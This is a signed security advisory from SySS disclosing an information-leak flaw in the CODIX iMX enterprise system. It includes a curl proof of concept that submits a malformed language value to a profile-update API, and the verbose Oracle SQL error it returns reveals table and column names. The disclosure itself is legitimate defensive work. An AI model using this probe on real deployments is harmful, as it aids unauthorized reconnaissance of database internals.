-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2026-012 Product: iMX Manufacturer: CODIX Affected Version(s): N.A. Tested Version(s): N.A. Vulnerability Type: Generation of Error Message Containing Sensitive Information (CWE-209) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2026-02-27 Solution Date: - Public Disclosure: 2026-04-30 CVE Reference: Not yet assigned Author of Advisory: Brian Ottmann, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: iMX is an enterprise management system covering contracts, receivables, financing, factoring, credit insurance, loans, leasing, collections, legal disputes, and more. The manufacturer describes the product as follows (see [1]): "iMX is the result of many years of research and development at the heart of the first European technopolis: Sophia Antipolis, on the French Riviera, near Nice. iMX is an innovative solution which handles - within its unique technical environment - 100% of the industry-standard functions of various service businesses as well as the particular requirements of each Client." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The application can be put in an exceptional state in which it is possible to force an extensive SQL error. This behavior can be reproduced by submitting overlong strings or nonexistent country codes in the "/ec_ua_personal_info" directory. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): 1. Log in with valid credentials to obtain a valid session. 2. Change personal information inside the profile and submit overlong strings or a nonexistent country code inside the request. Proof with nonexistent country code: === curl --path-as-is -s -k [...] --data-binary $'{\"lName\":\"\",\"fName\":\"\",\"language\":\"non-existent\",\"email\":\"SYSS@xx.xx.GS\",\"phone\":\"null1\",\"city\":\"City\",\"postCode\":\"123123\",\"address\":\"\"}' \ $'https://[customer]/iMX/api/be/personalInfo/updateInfo' {"status":"BAD_REQUEST","results":null,"incidentId":"7d15[...]de786","messages":["PreparedStatementCallback; uncategorized SQLException for SQL [UPDATE g_individu SET genre = ?, nom = UPPER(trim(?)), prenom = UPPER(trim(?)), adr1 = UPPER(trim(?)), adr2 = UPPER(trim(?)), cp = trim(?), ville = UPPER(trim(?)), pays = ?, siret = trim(?), nomcontact = UPPER(trim(?)), tel1 = trim(?), telecop = trim(?), dtnaiss_dt = ?, moralphy = ?, tel2 = trim(?), telex = trim(?), tel3 = trim(?), email = UPPER(trim(?)), langue = ? WHERE refindividu = ? ]; SQL state [72000]; error code [12899]; ORA-12899: value too large for column \"IMXDB\".\"G_INDIVIDU\".\"LANGUE\" (actual: 6, maximum: 3)\n; nested exception is java.sql.SQLException: ORA-12899: value too large for column \"IMXDB\".\"G_INDIVIDU\".\"LANGUE\" (actual: 6, maximum: 3)\n"]} === ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: N.A. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2026-02-25: Vulnerability discovered 2026-02-27: Vulnerability reported to manufacturer 2026-03-09: Contacted different contact person 2026-03-27: Contact retry 2026-04-30: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for iMX https://www.codix.eu/en/software/about-imx [2] SySS Security Advisory SYSS-2026-012 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2026-012.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Brian Ottmann of SySS GmbH. E-Mail: brian.ottmann@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Brian_Ottmann.asc PGP-Fingerprint: CBDF 14A4 83A9 4C31 5861 CF4F 78B4 D7D8 E8E6 65B1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEy98UpIOpTDFYYc9PeLTX2OjmZbEFAmny/TwACgkQeLTX2Ojm ZbF1WA//dL1oH/htrTgghJ2EW0aC7kxDZqg+A6KXsM3JcJ2C5Q37vFGOrG7eLuAg 4GfReryUMESyLChORZVEhG0QSA1zQn3o/NEiA5EsVZzX4hbIj+IIdOxPpiiV4Zlj Kb4AkL6GHcqd5HLXy2tFUpUL5KXtADP6B3W9sBDKBa6Fn4HCwHasl9eoSxiaEuVv cVRFn3PrD5f3naDRLnlaEc7c1Bl8oa7rqWJDWvTTSIiIJCTdiawfq+8zYHzj23DG fWgwXHercGuqYzDyfUwPcSPFgNfvrg+KX8ROtxMDXzC3zgVC5wiq9lXRy+1aGK5c NThMvRoUinRx21EpQS3wnRhijgMID157vz8KNDe6Q/t4RSBi99QMEZ1iQnxyD9n1 dbKP/YfJC6OXklj3a17dDvQ2PKq0yUdRcoLJcd9rvJl1KZlA0MCXWfDmgF5x2Ktx FymSlJo92bEmnIbNoyP6tcnmh+eOjNgopJDCqXkG9JkAKzIJceH/NjRtyPJmBQ3x bP+m+59A8mENsZOG1YgiDBI4N6VKVadStC3xhzcgbNztzVIpnLknBoqhjPkCooyq U76sHYJN3hsbVHVIN6gLRYol0ntV4ZGnZqJC/meOZtXjtosStdd5Qd3igosaPqUt OFBovACXyxEC5NdQSogRC7+x3X9ybx3xFcAaUicbgFj9t4ecLzM= =0M09 -----END PGP SIGNATURE-----